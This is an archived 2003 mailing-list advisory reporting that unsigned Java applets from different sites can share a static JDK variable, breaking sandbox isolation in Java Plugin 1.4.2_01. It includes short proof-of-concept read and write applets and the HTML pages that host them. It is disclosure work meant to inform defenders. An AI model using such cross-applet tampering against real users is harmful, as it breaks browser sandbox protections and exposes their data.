lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Pine.A41.4.44.0310202322140.98868-100000@zivunix.uni-muenster.de>
From: schonef at uni-muenster.de (Marc Schoenefeld)
Subject: Cross Site Java applets

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cross-Site Java breaks Sandbox Isolation for Unsigned Applets
=============================================================

Product  : Java Plugin
Version  : 1.4.2_01
OS       : Win32 (should apply for other OSs too)
URL      : http://java.sun.com
Found by : Marc Schoenefeld (marc@...egalaccess.org)
Date     : 10/21/03

PROBLEM DESCRIPTION :
Cross-Site Java
Unsigned applets coming from different sites may share data areas via
undocumented static variables of the jdk. While altering these variables
JDK internal states may become corrupt and functionality is no longer. This
especially concerns XML processing which depends on the
org.apache.xalan.processor.XSLProcessorVersion class.
This behavior violates the isolation restriction of the sandbox.

STEPS TO FOLLOW TO REPRODUCE THE PROBLEM :
Two applets,
 - one on siteA: www.siteA.org => Read.html / ReadApplet.class
 - one on siteB: www.siteB.org => Write.html / WriteApplet.class

Applet from siteB can share a variable also accessible (read and write)
which is used by siteA. So data protection is not guaranteed, an unsigned
applet may grab data stored in this variable by a signed applet
or interfere it's XML processing and therefore violates the isolation
restriction of the sandbox.


==========READAPPLET=========================
/* Illegalaccess.org java exploit */
/* coded by Marc Schoenefeld      */

import java.awt.Graphics;

public class ReadApplet extends java.applet.Applet {

    public void paint(Graphics g)
    {

System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION);
    }

   static {

System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION);
   }
}
==========READAPPLET=========================

==========WRITEAPPLET=========================
import java.awt.Graphics;


public class WriteApplet extends java.applet.Applet {
    public void paint(Graphics g)
    {
        org.apache.xalan.processor.XSLProcessorVersion.S_VERSION += "a";
    }


   static {
      org.apache.xalan.processor.XSLProcessorVersion.S_VERSION = "altered
from
SiteA";
  }
}
==========WRITEAPPLET=========================


=========Write.html============================
<HTML>
<BODY BGCOLOR=#66FF66>
<PRE>
WriteApplet, write to variable
Marc (marc@....illegalaccess)
</PRE>
<applet codebase=. code=WriteApplet.class width=100 height=100>
</applet>
</BODY>
</HTML>

========Read.html=============================
<HTML>
<BODY BGCOLOR=#6666FF>
<PRE>
ReadApplet, read from variable
Marc (marc@....illegalaccess)
</PRE>
<applet codebase=. code=ReadApplet.class width=100 height=100>
</applet>
</BODY>
</HTML>


- --

Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous

Marc Sch?nefeld Dipl. Wirtsch.-Inf. / Software Developer
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (AIX)
Comment: For info see http://www.gnupg.org

iD8DBQE/lFKWqCaQvrKNUNQRAtSgAJ4k2hORvU0sxMYejBdc03dEFmUT8wCePPWy
+gwoqNdNGQ9VGJv3gnfxoVY=
=HPdA
-----END PGP SIGNATURE-----



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ